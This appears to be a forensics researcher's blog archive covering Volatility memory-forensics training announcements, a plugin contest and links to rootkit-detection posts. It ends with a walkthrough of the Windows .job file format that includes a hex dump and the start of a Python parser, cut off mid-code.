Also we (Volatility) are holding our third run of <a href="http://volatility-labs.blogspot.com/2013/03/official-training-by-volatility.html">Windows Malware and Memory Forensics in Reston, VA</a> from Monday June 10th through Friday, June 14th 2013. This training will not disappoint even the most proficient of forensic/malware analysts. It includes real-world scenarios that are reinforced with hands-on labs. All students will leave with skills and confidence to conduct investigations involving RAM samples from acquisition to the final report. Students also leave with more than just being Volatility power users, they leave with a deeper knowledge of memory forensics and malware analysis methodologies. Such knowledge is integral regardless of what tools you choose for future investigations, be they open source or commercial, and much more powerful than simply "run this tool, the output is colored red so it's bad". You'll leave the class with knowledge that will help you to figure out if something really is "bad" or not. There are still a few seats left for this training, so if you are interested you should register soon. Send an email to <u><b><i>voltraining [at] memoryanalysis.net</i> </b></u>for registration information.<br />
<br />
If you are looking for a course that covers both disk and memory forensics, <a href="https://twitter.com/attrc">Andrew Case</a> and I will teach our course in <a href="https://www.blackhat.com/us-13/training/digital-forensics-and-incident-response.html">Digital Forensics and Incident Response</a> again this summer at Black Hat Vegas. This course runs from July 27th through July 30th 2013 and will cover enough material to take someone from knowing practically nothing about digital forensics to a point where s/he can comfortably conduct his/her own investigations.<br />
<br />
Also we (Volatility) will hold another run of Windows Malware and Memory Forensics in the Netherlands from Monday September 9th through Friday, September 13th 2013. Details will appear soon on the <a href="http://volatility-labs.blogspot.com/search/label/training">Volatility Labs blog</a>.<br />
<br />
Planning for the Open Memory Forensics Workshop (OMFW) is in progress. You should plan to attend if you want to know what's new and hot in the memory forensics space. OMFW is likely to take place on November 4th, 2013, one day prior to the <a href="http://www.basistech.com/about-us/events/open-source-forensics-conference/">Sleuth Kit and Open Source Digital Forensics Conference</a>. Final details will appear soon on the <a href="http://volatility-labs.blogspot.com/">Volatility Labs blog</a>.<br />
<br />
<b>Windows Malware and Memory Forensics Training in The Windy City!</b> (2013-01-14)<br />
<div class="tr_bq">
Cross posted from the <a href="http://volatility-labs.blogspot.com/2013/01/windows-malware-and-memory-forensics.html">Volatility Labs Blog</a>: </div>
<br />
<blockquote>
<span style="font-family: inherit;">The next journey to the center of Windows Memory Forensics starts in Chicago this March! </span> </blockquote>
<blockquote>
<span style="font-family: inherit;">We are pleased to announce the second public offering of the <i>Windows Malware and Memory Forensics Training by The Volatility Project</i>. This is the only memory forensics course officially designed,
sponsored, and taught by the Volatility developers. One of the main
reasons we made Volatility open-source is to encourage and facilitate a
deeper understanding of how memory analysis works, where the evidence
originates, and how to interpret the data collected by the framework's
extensive set of plugins. Now you can learn about these benefits first hand
from the developers of the most powerful, flexible, and innovative
memory forensics tool. </span><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">Appraisal from your peers who attended the first course this past December:</span><span style="font-family: inherit;"><br /></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikAXx-CGrd4Q5qX40IALjTlg1FhStGKLG27EZASjZkcyu33jaTMpufspZu09MNFCYPl4ThdWyvCa6e7GIMq6XPxUiot2jezhIfzhXLbv0_INH0cAkwconuaZo4iofHCMXpeOsx/s1600/5starimg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikAXx-CGrd4Q5qX40IALjTlg1FhStGKLG27EZASjZkcyu33jaTMpufspZu09MNFCYPl4ThdWyvCa6e7GIMq6XPxUiot2jezhIfzhXLbv0_INH0cAkwconuaZo4iofHCMXpeOsx/s400/5starimg.png" width="400" /></a><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">Please see the following details about the upcoming training event:</span><br />
Dates: Monday, March 18th through Friday, March 22nd 2013<br />
Location: Downtown Chicago, IL (exact location will be shared upon registration)<br />
Instructors: Michael Ligh (<a href="http://twitter.com/imhlv2">@iMHLv2</a>), Andrew Case (<a href="http://twitter.com/attrc">@attrc</a>), Jamie Levy (<a href="http://twitter.com/gleeda">@gleeda</a>)<br />
For more information about the course, view the <a href="https://docs.google.com/open?id=0B6sJr6AdVULGaVQ0UDNBX1A4MjA">Volatility Training Flyer</a> (to download a copy of the PDF, click File > Download). To request a link to the online registration site or to receive a detailed course agenda/outline, please send an email to voltraining [at] memoryanalysis.net.</blockquote>
Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-80642399774069922012013-01-14T15:32:00.000-05:002013-01-14T15:34:47.344-05:00The 1st Annual Volatility Framework Plugin ContestCross posted from the <a href="http://volatility-labs.blogspot.com/2013/01/the-1st-annual-volatility-framework.html">Volatility Labs Blog:</a>
<br />
<br />
<blockquote>We are pleased to announce the 1st Annual Volatility Plugin Contest. This contest is inspired and modeled after the <a href="http://www.hex-rays.com/contests/index.shtml">Hex-Rays Plugin Contest</a>. As in the case of IDA, Volatility was designed with the belief that talented analysts should only be limited by their creativity, not the tools they use. In this spirit, Volatility has a flexible architecture that can be extended in numerous ways: analysis plugins (operating system plugins, application plugins, etc), volshell commands, address spaces, profiles, or user interfaces. This contest is intended to inspire people to demonstrate their creativity, become a memory analysis pioneer, win the admiration of your peers, and give back to the community.<br />
<br />
The contest is straightforward: Create an innovative and useful extension to <a href="http://code.google.com/p/volatility/">The Volatility Framework</a> and win the contest!<br />
<br />
<ul>
<li>1st place wins one free seat at any future <a href="http://volatility-labs.blogspot.com/2013/01/windows-malware-and-memory-forensics.html">Windows Malware and Memory Forensics Training</a> *or* 1500 USD cash</li>
<li>2nd place wins 500 USD cash</li>
<li>3rd place wins 250 USD cash</li>
<li>4th and 5th place win Volatility swag (T-shirts, Stickers, etc)</li>
</ul>
<br />
Everyone but the Volatility core developers can participate.<br />
<br />
<u>Rules of Engagement</u><br />
<br />
<ol>
<li>The goal of the contest is to create innovative, interesting, and useful extensions for The Volatility Framework. While extensions written in Python are preferred, extensions written in other languages will also be considered.</li>
<li>The submitted extensions should work with the Volatility 2.2 (or greater) release and should have been implemented after the initial contest announcement (1/14/2013).</li>
<li>The top 5 winners of the contest will get the prizes mentioned above.</li>
<li>Volatility core developers are not eligible.</li>
<li>Submissions should be sent to volcon2013@memoryanalysis.net. The submission should include the source code, a short description of how the extension is used, and a signed "Individual Contributor License Agreement".</li>
<li>By submitting an entry, you declare that you own the copyright to the source code and are authorized to submit it.</li>
<li>All submissions should be received no later than August 1, 2013. The winner will be announced the following week. We recommend submitting early. In the case of similar submissions, preference will be shown to early submissions.</li>
<li>The Volatility Project core developers will decide the winners based on the following criteria: creativity, usefulness, effort, completeness, submission date, and clarity of documentation.</li>
<li>In order to collect the cash prizes, the winner will need to provide a legal picture identification and bank account information within 30 days of notification. The bank transfer will be made within two weeks after the winner is authenticated.</li>
<li>Group entries are allowed; the prize will be paid (or seat will be registered, if the training option is desired) to the person designated by the group.</li>
<li>Upon approval from the winners, their names/aliases will be listed on the "Volatility Hall of Fame" web page for the world to admire.</li>
<li>Selected contestants may also be asked to present their work at the 2013 Open Memory Forensics Workshop or have their research featured on the Volatility Labs Blog.</li>
</ol>
<br />
<u>Acknowledgements</u><br />
<br />
A special thanks goes out to the Hex-Rays team for providing the inspiration and template for this contest. <br />
<br /></blockquote>Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-64267643805190657742012-11-13T13:36:00.001-05:002012-11-13T13:36:26.840-05:00Windows Memory Forensics Training for Analysts by Volatility Developers<span style="font-family: inherit;">We are pleased to announce the first public offering of the Windows Memory Forensics for Analysts training course. This is the only memory forensics course officially designed, sponsored, and taught by the Volatility developers. One of the main reasons we made Volatility open-source is to encourage and facilitate a deeper understanding of how memory analysis works, where the evidence originates, and how to interpret the data collected by the framework's extensive set of plugins. Now you can reap these benefits first hand from the developers of the most powerful, flexible, and innovative memory forensics tool. </span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Please see the following details about the upcoming training event:</span><br />
<br />
Dates: Monday, December 3rd through Friday, December 7th 2012<br />
Location: Reston, Virginia (exact location will be shared upon registration)<br />
Instructors: Michael Ligh (<a href="http://twitter.com/imhlv2">@iMHLv2</a>), Andrew Case (<a href="http://twitter.com/attrc">@attrc</a>), Jamie Levy (<a href="http://twitter.com/gleeda">@gleeda</a>). Please see the <a href="http://code.google.com/p/volatility/wiki/VolatilityTeam">VolatilityTeam</a> wiki page for brief bios.<br />
<br />
<b>Overview:</b><br />
<br />
The ability to perform digital investigations and incident response is becoming a critical skill for many occupations. Unfortunately, digital investigators frequently lack the training or experience to take advantage of the volatile artifacts found in physical memory. Volatile memory contains valuable information about the runtime state of the system, provides the ability to link artifacts from traditional forensic analysis (network, file system, registry), and provides investigative leads that have been unknown to most analysts. Malicious adversaries have been leveraging this knowledge disparity to undermine many aspects of the digital investigation process with such things as anti-forensics techniques, memory resident malware, kernel rootkits, encryption (file systems, network traffic, etc), and Trojan defenses. The only way to turn the tables and defeat a creative digital human adversary is through talented analysts.<br />
<br />
This course will demonstrate why memory forensics is a
critical component of the digital investigation process and how investigators
can gain the upper hand. The course will
consist of lectures on specific topics in Windows memory forensics followed by
intense hands-on exercises to put the topics into real world contexts. Exercises will
require analysis of malware in memory, kernel-level rootkits, registry artifacts found in
memory, signs of data exfiltration, and much more. This course is your
opportunity to learn these invaluable skills from the researchers and
developers that have pioneered the field. This is also the only memory
forensics training class that is authorized to teach Volatility, officially
sponsored by The Volatility Project, and taught directly by the Volatility
developers.<br />
<br />
<b>Who should attend?</b><br />
<br />
This course is intended for malware analysts, reverse engineers,
incident responders, digital forensics analysts, law enforcement
officers, federal agents, system administrators, corporate
investigators, or anyone who wants to develop the skills necessary to
combat advanced adversaries.<br />
<br />
<b>Course Prerequisites</b><br />
<ul>
<li>It is recommended that students have some experience with the Volatility Framework.</li>
<li>Students should possess a basic knowledge of digital investigation tools and techniques.</li>
<li>Students should be comfortable with general troubleshooting of both Linux and Windows operating systems (setup, configuration, networking).</li>
<li>Students should be familiar with popular system administration tools (e.g., the Sysinternals Utilities).</li>
<li>Students should be both familiar and comfortable with using the command line.</li>
<li>Students should have a basic understanding of Python or a similar scripting language.</li>
</ul>
<b>Course Structure</b><br />
<br />
This is a 5-day course composed of both classroom learning and hands-on
training exercises and scenarios. All course material, lunches, and
coffee breaks will be provided (If you have unique dietary restrictions,
please make them known during registration).<br />
<br />
<b>Course Requirements</b><br />
<br />
In order to fully participate in the course, students are required to
bring a properly pre-configured laptop. Students are encouraged to
bring laptops that can run both Linux and Windows, where either instance
is virtualized based on student preference. It is the student's
responsibility to make sure the laptop is configured prior to the
beginning of the course. There is no time built into the course schedule to
help people configure machines, so please make sure your laptop has
been properly configured before showing up for class.<br />
<br />
Minimum Hardware Requirements:<br />
2.0 GHz CPU<br />
4 GB of RAM<br />
20 GB of disk space<br />
DVD-ROM drive<br />
USB 2.0 ports<br />
Wireless Network Interface Card<br />
<br />
Software Requirements:<br />
Python 2.6 or 2.7<br />
Microsoft Windows Debugger<br />
VMware Workstation 6/Fusion 3 or higher<br />
7-Zip (or ability to decompress zip, gzip, rar, etc)<br />
Wireshark<br />
<br />
Additional free/open-source tools or libraries may be required to complete hands-on exercises. More information will be shared upon registration.<br />
<br />
<b>Course Fee:</b><br />
<br />
The cost of the course is $3500. Law enforcement, government, and educational discounts are available.<br />
<br />
<b>Registration: </b><br />
<br />
To obtain information on registration, please email voltraining [ @ ] memoryanalysis.net.<br />
<b><br /></b>
<b>Other Course Benefits:</b><br />
<br />
Students will be supporting open source development (Volatility)<br />
Preparation for the Advanced Memory Analyst Certification (AMAC)Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-10438630248420869972012-11-12T13:23:00.000-05:002012-11-13T13:36:21.252-05:00ACSAC 2012I will be teaching a full-day course on Windows Forensics and IR at the <a href="http://www.acsac.org/">Annual Computer Security Applications Conference (ACSAC)</a> on December 4th at the <a href="http://www.acsac.org/2012/hotel/">Buena Vista Palace Hotel &amp; Spa</a> in Orlando, FL. There is still time to <a href="http://www.acsac.org/2012/registration/">sign up</a> for the conference and/or training, and it looks like a <a href="http://www.acsac.org/2012/openconf/modules/request.php?module=oc_program&action=program.php&p=at_a_glance">good program</a> this year.Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-86853425974908074632012-09-29T20:05:00.002-04:002012-09-29T20:06:50.188-04:00Week 3 of the Month of Volatility Plugins posted!Cross posted from <a href="http://memoryforensics.blogspot.com/2012/09/week-3-of-month-of-volatility-plugins.html">Andrew Case's blog</a>:<br />
<br />
<blockquote class="tr_bq">
I was writing to announce that week 3 of the month of Volatility plugins
is finished, and we now have five more in-depth blog posts covering
Windows
and Linux internals and rootkit detection as well as a bonus plugin that
analyzes Internet Explorer browsing history. These have all been posted
on
the Volatility Labs blog.<br />
<br />
Post 1: Detecting Malware Hooks in the Windows GUI Subsystem<br />
<br />
This Windows focused post covers detecting malware hooks in the Windows
GUI subsystem, including message hooks and event hooks, and what effects
these hooks can have on a compromised system.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html">http://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html</a><br />
<br />
<br />
Post 2: Shellbags in Memory, SetRegTime, and TrueCrypt Volumes<br />
<br />
This Windows focused post covers finding and recovering shellbags from
memory, the forensic importance of shellbags, and analyzes the effects
of anti-forensics on shellbag timestamps. It concludes with covering the
traces left in shellbags by TrueCrypt.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-32-shellbags-in-memory-setregtime.html">http://volatility-labs.blogspot.com/2012/09/movp-32-shellbags-in-memory-setregtime.html</a><br />
<br />
<br />
Post 3: Analyzing USER Handles and the Win32k.sys Gahti
<br />
<br />
This Windows focused post introduces two new plugins, one named <span style="font-family: Courier New, Courier, monospace;">gahti</span> that determines the various different types of USER objects on a system and another named <span style="font-family: Courier New, Courier, monospace;">userhandles</span> which traverses the handle table entries and associates them with the owning processes or threads.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-33-analyzing-user-handles-and.html">http://volatility-labs.blogspot.com/2012/09/movp-33-analyzing-user-handles-and.html</a><br />
<br />
<br />
Post 4: Recovering tagCLIPDATA: What's In Your Clipboard?
<br />
<br />
This Windows focused post covers recovery of the Windows clipboard from physical memory.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-34-recovering-tagclipdata-whats-in.html">http://volatility-labs.blogspot.com/2012/09/movp-34-recovering-tagclipdata-whats-in.html</a><br />
<br />
<br />
Post 5: Analyzing the 2008 DFRWS Challenge with Volatility
<br />
<br />
This Linux focused post analyzes the 2008 memory challenge with
Volatility. It walks through the artifacts produced by the winning team
and shows how to recover the same information with Volatility. It then
shows plugins in Volatility that can recover artifacts not produced by
the winning team.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-35-analyzing-2008-dfrws-challenge.html">http://volatility-labs.blogspot.com/2012/09/movp-35-analyzing-2008-dfrws-challenge.html</a><br />
<br />
<br />
Bonus Post: HowTo: Scan for Internet Cache/History and URLs<br />
<br />
This Windows focused post covers how to recover Internet Explorer's cache and history from a memory sample.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/howto-scan-for-internet-cachehistory.html">http://volatility-labs.blogspot.com/2012/09/howto-scan-for-internet-cachehistory.html</a><br />
<br />
If you have any questions or comments on the posts, please leave a comment on the respective post on the Volatility Labs blog.
</blockquote>
Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-5214140298747107612012-09-21T11:16:00.000-04:002012-09-21T11:17:00.269-04:00Week 2 of the Month of Volatility Plugins posted!It's been an exciting week in the <a href="http://code.google.com/p/volatility/">Volatility</a> community. We've just finished our second week of Month of Volatility Plugins (MoVP) blog posts, released <a href="http://code.google.com/p/volatility/downloads/list">Volatility 2.2 RC2</a> for testing, fixed a few minor bugs, and now we're gearing up for our third week of posts and the upcoming <a href="https://www.volatilesystems.com/default/omfw">Open Memory Forensics Workshop (OMFW)</a>. Here is a list of this week's posts, <a href="http://memoryforensics.blogspot.com/2012/09/week-2-of-month-of-volatility-plugins.html">compiled by Andrew Case</a>:<br />
<br />
<blockquote class="tr_bq">
I was writing to announce that week 2 of the month of Volatility plugins
is finished, and we now have five more in-depth blog posts covering Windows
and Linux internals and rootkit detection. These have all been posted to
the new Volatility Labs blog.<br />
<b><br />Post 1: Atoms (The New Mutex), Classes and DLL Injection
</b>
<br />
<br />
This Windows focused post covers investigating malware and understanding infections by analyzing the atom tables.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-21-atoms-new-mutex-classes-and-dll.html">http://volatility-labs.blogspot.com/2012/09/movp-21-atoms-new-mutex-classes-and-dll.html</a><br />
<br />
<b>Post 2: Malware in your Windows</b><br />
<br />
This Windows focused post covers enumerating and analyzing windows in the GUI subsystem.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-22-malware-in-your-windows.html">http://volatility-labs.blogspot.com/2012/09/movp-22-malware-in-your-windows.html</a><br />
<br />
<b>Post 3: Event logs and Service SIDs</b><br />
<br />
This Windows focused post demonstrates recovering event logs from memory and calculating service SIDs.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-23-event-logs-and-service-sids.html">http://volatility-labs.blogspot.com/2012/09/movp-23-event-logs-and-service-sids.html</a><br />
<br />
<b>Post 4: Analyzing the Jynx rootkit and LD_PRELOAD
</b><br />
<br />
This Linux focused post covers analyzing the Jynx rootkit as well as generic methods for analyzing LD_PRELOAD based rootkits. </blockquote>
<blockquote class="tr_bq">
<a href="http://volatility-labs.blogspot.com/2012/09/movp-24-analyzing-jynx-rootkit-and.html">http://volatility-labs.blogspot.com/2012/09/movp-24-analyzing-jynx-rootkit-and.html</a><br />
<br />
<b>Post 5: Investigating In-Memory Network Data with Volatility
</b><br />
<br />
This Linux focused post goes through each of the Linux Volatility
plugins related to recovering network data from memory, such as network
connections, packets, and the routing cache.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-25-investigating-in-memory-network.html">http://volatility-labs.blogspot.com/2012/09/movp-25-investigating-in-memory-network.html</a><br />
<br />
If you have any questions or comments on the posts, please leave a comment on the respective post on the Volatility Labs blog.
</blockquote>
<br />
We hope you've enjoyed this week's series. Stay tuned, we have much more in store! <br />
<span class="post-author vcard"></span>Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-33046890057329702922012-09-14T13:00:00.001-04:002012-09-14T13:01:13.714-04:00Week 1 of the Month of Volatility Plugins posted! I'm going to borrow from <a href="http://memoryforensics.blogspot.com/2012/09/week-1-of-month-of-volatility-plugins.html">Andrew's blog</a> here to let you know about our Month of Volatility Plugins:<br />
<br />
<blockquote class="tr_bq">
I was writing to announce that week 1 of the month of Volatility plugins
is finished, and we now have five in-depth blog posts covering Windows
and Linux internals and rootkit detection. These have all been posted to
the new Volatility Labs blog.<br />
<br />
Post 1: Logon Sessions, Processes, and Images<br />
<br />
This Windows focused post covers linking processes to their logon
session, detecting hidden processes using session structures, and
determining the drivers mapped into each session.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-11-logon-sessions-processes-and.html" target="_blank">http://volatility-labs.blogspot.com/2012/09/movp-11-logon-sessions-processes-and.html</a><br />
<br />
Post 2: Window Stations and Clipboard Malware<br />
<br />
This Windows focused post covers enumerating and analyzing window stations and clipboard monitoring malware.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-12-window-stations-and-clipboard.html" target="_blank">http://volatility-labs.<wbr></wbr>blogspot.com/2012/09/movp-12-<wbr></wbr>window-stations-and-clipboard.<wbr></wbr>html</a><br />
<br />
Post 3: Desktops, Heaps, and Ransomware<br />
<br />
This Windows focused post covers finding rogue desktops used to hide
applications and created by ransomware, linking threads to desktops,
analyzing the desktop heap for memory corruptions, and profiling heap
allocations to locate USER objects.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-13-desktops-heaps-and-ransomware.html" target="_blank">http://volatility-labs.<wbr></wbr>blogspot.com/2012/09/movp-13-<wbr></wbr>desktops-heaps-and-ransomware.<wbr></wbr>html</a><br />
<br />
Post 4: Average Coder Rootkit, Bash History, and Elevated Processes<br />
<br />
This Linux focused post covers analyzing the Average Coder rootkit,
recovering .bash_history from memory, even when faced with
anti-forensics, and finding elevated processes.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-14-average-coder-rootkit-bash.html" target="_blank">http://volatility-labs.<wbr></wbr>blogspot.com/2012/09/movp-14-<wbr></wbr>average-coder-rootkit-bash.<wbr></wbr>html</a><br />
<br />
Post 5: KBeast Rootkit, Detecting Hidden Modules, and sysfs<br />
<br />
This Linux focused post covers analyzing the KBeast rootkit, finding
modules unlinked from the module list, and the forensic value of sysfs.<br />
<br />
<a href="http://volatility-labs.blogspot.com/2012/09/movp-15-kbeast-rootkit-detecting-hidden.html" target="_blank">http://volatility-labs.blogspot.com/2012/09/movp-15-kbeast-rootkit-detecting-hidden.html</a><br />
<br />
<br />
If you have any questions or comments on the posts, please leave a comment on the respective post on the Volatility Labs blog.
</blockquote>
<br />
Future Volatility posts will appear on our official blog (<a href="http://volatility-labs.blogspot.com/">http://volatility-labs.blogspot.com/</a>). Also you might want to follow our project on twitter: <a href="https://twitter.com/volatility">@Volatility</a> for updates and news. See you at <a href="https://www.volatilesystems.com/default/omfw">OMFW!</a>Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-85720034859287965572012-09-01T19:26:00.001-04:002012-09-03T16:17:49.422-04:00Job File Parser<p>While writing material for the <a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_digital_forensics.html" target="_blank">Blackhat training course</a> that <a href="https://twitter.com/attrc">Andrew Case</a> and I gave this summer, I realized that there did not appear to be many tools that would parse <a href="http://msdn.microsoft.com/en-us/library/cc248285%28v=prot.13%29.aspx">job files</a>. At that time, <a href="https://twitter.com/keydet89">Harlan Carvey</a> had <a href="http://windowsir.blogspot.com/2009/09/parsing-job-files.html">written a blog post</a> on job files and had mentioned them in part of his <a href="http://windowsir.blogspot.com/p/timelines.html">timeline</a> materials, but he had not yet released his Perl script (it has since been released <a href="http://code.google.com/p/winforensicaanalysis/downloads/detail?name=jobparse.pl&can=2&q=">here</a>). This prompted me to write a parser of my own in Python.</p>
<p>A .job file consists of two sections: 1) a <a href="http://msdn.microsoft.com/en-us/library/cc248286%28v=prot.13%29.aspx">Fixed Length</a> section and 2) a <a href="http://msdn.microsoft.com/en-us/library/cc248287%28v=prot.13%29.aspx">Variable Length</a> section. The MSDN documentation describes both well enough to tell us how to parse them.</p>
<p>So what does a .job file look like?</p>
<pre><p class="code">
$ xxd At5.job
0000000: 0006 0100 e378 73f7 4d8b 2a45 a589 1cc5 .....xs.M.*E....
0000010: fa64 cfd2 4600 cc00 0000 0000 3c00 0a00 .d..F.......&lt;...
0000020: 2000 0000 0014 730f 0000 0000 0513 0400 .....s.........
0000030: 0200 e421 dc07 0700 0100 1000 0b00 1a00 ...!............
0000040: 0000 0f00 0000 0400 6300 6d00 6400 0000 ........c.m.d...
0000050: 0f00 2f00 6300 2000 6e00 6f00 7400 6500 ../.c. .n.o.t.e.
0000060: 7000 6100 6400 2e00 6500 7800 6500 0000 p.a.d...e.x.e...
0000070: 0000 0700 5300 5900 5300 5400 4500 4d00 ....S.Y.S.T.E.M.
0000080: 0000 1e00 4300 7200 6500 6100 7400 6500 ....C.r.e.a.t.e.
0000090: 6400 2000 6200 7900 2000 4e00 6500 7400 d. .b.y. .N.e.t.
00000a0: 5300 6300 6800 6500 6400 7500 6c00 6500 S.c.h.e.d.u.l.e.
00000b0: 4a00 6f00 6200 4100 6400 6400 2e00 0000 J.o.b.A.d.d.....
00000c0: 0000 0800 0000 0000 0000 0000 0100 3000 ..............0.
00000d0: 0000 dc07 0700 1000 0000 0000 0000 0b00 ................
00000e0: 1a00 0000 0000 0000 0000 0000 0000 0000 ................
00000f0: 0000 feff ffff fd68 7377 0000 0000 0100 .......hsw......
0000100: 0100 0416 10dd 78d9 b300 f7f0 9b20 9bd8 ......x...... ..
0000110: a0c4 5108 c943 d5c9 c64f 47ea 6052 0349 ..Q..C...OG.`R.I
0000120: 23e1 e1ab 6815 e8ef 219e 6d3b aa88 1360 #...h...!.m;...`
0000130: 706b c27b 2e44 9db1 4e89 81ca dd0a 869e pk.{.D..N.......
0000140: 2b61 .6..
</p></pre>
<p>We can see the first section of the job file below:</p>
<pre><p class="code">
0000000: 0006 0100 e378 73f7 4d8b 2a45 a589 1cc5 .....xs.M.*E....
0000010: fa64 cfd2 4600 cc00 0000 0000 3c00 0a00 .d..F.......&lt;...
0000020: 2000 0000 0014 730f 0000 0000 0513 0400 .....s.........
0000030: 0200 e421 dc07 0700 0100 1000 0b00 1a00 ...!............
0000040: 0000 0f00 ....
</p></pre>
<p>The fixed length section is pretty straightforward (I will only fill in a few of the values):<br>
0-2: <a href="http://msdn.microsoft.com/en-us/library/2d1fbbab-fe6c-4ae5-bdf5-41dc526b2439%28v=prot.13%29#id11">Product Info</a> (0x600 - Vista)<br>
2-4: File Version (0x1)<br>
4-20: <a href="http://msdn.microsoft.com/en-us/library/aa379358%28v=vs.85%29.aspx">UUID</a> ({F77378E3-8B4D-452A-A589-1CC5FA64CFD2})<br>
20-22: Application Name Offset (0x46)<br>
22-24: Trigger Offset (0xcc)<br>
24-26: Error Retry Count (0x00)<br>
26-28: Error Retry Interval (0x00)<br>
28-30: Idle Deadline (0x3c)<br>
30-32: Idle Wait (0xa)<br>
32-36: Priority<br>
36-40: Maximum Runtime<br>
40-44: Exit Code (0x0)<br>
44-48: Status (0x41305)<br>
48-52: <a href="http://msdn.microsoft.com/en-us/library/cc248283%28v=prot.13%29.aspx">Flags</a><br>
52-68: Run Date (Monday Jul 16 11:26:00.15 2012)<br>
</p>
<p>The variable length section stores a length (shown in red below) in front of several of the data members described in the MSDN documentation:</p>
<pre><p class="code">
0000 <font color="red">0400</font> 6300 6d00 6400 0000 ...c.m.d...
0000050: <font color="red">0f00</font> 2f00 6300 2000 6e00 6f00 7400 6500 ../.c. .n.o.t.e.
0000060: 7000 6100 6400 2e00 6500 7800 6500 0000 p.a.d...e.x.e...
0000070: <font color="red">0000</font> <font color="red">0700</font> 5300 5900 5300 5400 4500 4d00 ....S.Y.S.T.E.M.
0000080: 0000 <font color="red">1e00</font> 4300 7200 6500 6100 7400 6500 ....C.r.e.a.t.e.
0000090: 6400 2000 6200 7900 2000 4e00 6500 7400 d. .b.y. .N.e.t.
00000a0: 5300 6300 6800 6500 6400 7500 6c00 6500 S.c.h.e.d.u.l.e.
00000b0: 4a00 6f00 6200 4100 6400 6400 2e00 0000 J.o.b.A.d.d.....
00000c0: 0000 0800 0000 0000 0000 0000 0100 3000 ..............0.
00000d0: 0000 dc07 0700 1000 0000 0000 0000 0b00 ................
00000e0: 1a00 0000 0000 0000 0000 0000 0000 0000 ................
00000f0: 0000 feff ffff fd68 7377 0000 0000 0100 .......hsw......
0000100: 0100 0416 10dd 78d9 b300 f7f0 9b20 9bd8 ......x...... ..
0000110: a0c4 5108 c943 d5c9 c64f 47ea 6052 0349 ..Q..C...OG.`R.I
0000120: 23e1 e1ab 6815 e8ef 219e 6d3b aa88 1360 #...h...!.m;...`
0000130: 706b c27b 2e44 9db1 4e89 81ca dd0a 869e pk.{.D..N.......
0000140: 2b61 .6..
</p></pre>
<p>Going over some of the data above, we have:<br>
Running instance count (0x0)<br>
Command Name Length (0x4 - includes the ending '\x00')<br>
Command Name (cmd)<br>
Parameter Length (0xf)<br>
Parameter (/c notepad.exe)<br>
Working Directory Length (0x0)<br>
Working Directory (only present if Working Directory Length > 0)<br>
User Name Length (0x7)<br>
User Name (SYSTEM)<br>
Comment Length (0x1e)<br>
Comment (only present if Comment Length > 0 - Created by NetScheduleJobAdd.)<br>
<a href="http://msdn.microsoft.com/en-us/library/cc248306%28v=prot.13%29">User Data / Reserved Data</a><br>
Trigger count<br>
<a href="http://msdn.microsoft.com/en-us/library/cc248290%28v=prot.13%29">Triggers</a><br>
- Scheduled date (Jul 16 11:26:00.0 2012)<br>
<a href="http://msdn.microsoft.com/en-us/library/cc248299%28v=prot.13%29">Job Signature</a><br>
</p>
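<p>Putting the two sections together, here is an added Python parser, written for this write-up and not the author's jobparser.py, that walks the fixed-length header, the length-prefixed UTF-16LE strings, the trigger records and the signature header of the At5.job bytes dumped above. The field layout follows the MS-TSCH documents linked above; the dictionary key names and the small product-version table are my own, and the hex dump is embedded so the script runs with no input file.</p>

```python
"""Added example: parse a Task Scheduler .job file with struct.
Layout per the MS-TSCH docs linked above; bytes are the At5.job dump."""
import struct
import sys
import uuid
from datetime import datetime

# Hex column of the At5.job xxd dump above, reassembled (0x142 bytes).
AT5_JOB = bytes.fromhex("""
0006 0100 e378 73f7 4d8b 2a45 a589 1cc5 fa64 cfd2 4600 cc00 0000 0000 3c00 0a00
2000 0000 0014 730f 0000 0000 0513 0400 0200 e421 dc07 0700 0100 1000 0b00 1a00
0000 0f00 0000 0400 6300 6d00 6400 0000 0f00 2f00 6300 2000 6e00 6f00 7400 6500
7000 6100 6400 2e00 6500 7800 6500 0000 0000 0700 5300 5900 5300 5400 4500 4d00
0000 1e00 4300 7200 6500 6100 7400 6500 6400 2000 6200 7900 2000 4e00 6500 7400
5300 6300 6800 6500 6400 7500 6c00 6500 4a00 6f00 6200 4100 6400 6400 2e00 0000
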